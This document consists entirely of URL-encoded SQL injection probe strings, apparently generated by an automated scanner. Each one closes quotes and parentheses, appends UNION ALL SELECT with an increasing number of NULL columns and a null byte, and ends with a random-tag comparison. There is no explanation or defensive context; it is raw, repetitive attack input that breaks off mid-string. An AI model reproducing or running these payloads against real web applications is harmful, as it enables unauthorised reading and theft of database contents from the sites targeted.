1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22eWWw%22%3D%22eWWw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22bRBx%22%3D%22bRBx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jaiO%22%3D%22jaiO 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jzBG%22%3D%22jzBG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22tWTh%22%3D%22tWTh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zAyr%22%3D%22zAyr 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22mGFW%22%3D%22mGFW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22gKbw%22%3D%22gKbw 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hGXT%22%3D%22hGXT 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Cmxz%22%3D%22Cmxz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22qAql%22%3D%22qAql 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22AWZW%22%3D%22AWZW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22udag%22%3D%22udag 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22whPl%22%3D%22whPl 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22svNl%22%3D%22svNl 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22XEpg%22%3D%22XEpg 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22eBQt%22%3D%22eBQt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22fxin%22%3D%22fxin 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22UurR%22%20LIKE%20%22UurR 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22uPJy%22%20LIKE%20%22uPJy 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ncKF%22%20LIKE%20%22ncKF 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22HALQ%22%20LIKE%20%22HALQ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ANBA%22%20LIKE%20%22ANBA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22zvRg%22%20LIKE%20%22zvRg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22puOy%22%20LIKE%20%22puOy 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22RboP%22%20LIKE%20%22RboP 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22BWne%22%20LIKE%20%22BWne 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ouaY%22%20LIKE%20%22ouaY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22IzSc%22%20LIKE%20%22IzSc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TYZm%22%20LIKE%20%22TYZm 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ajmT%22%20LIKE%20%22ajmT 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22FHAN%22%20LIKE%20%22FHAN 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22XYzM%22%20LIKE%20%22XYzM 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22XTpK%22%20LIKE%20%22XTpK 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TeCt%22%20LIKE%20%22TeCt 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22zdyp%22%20LIKE%20%22zdyp 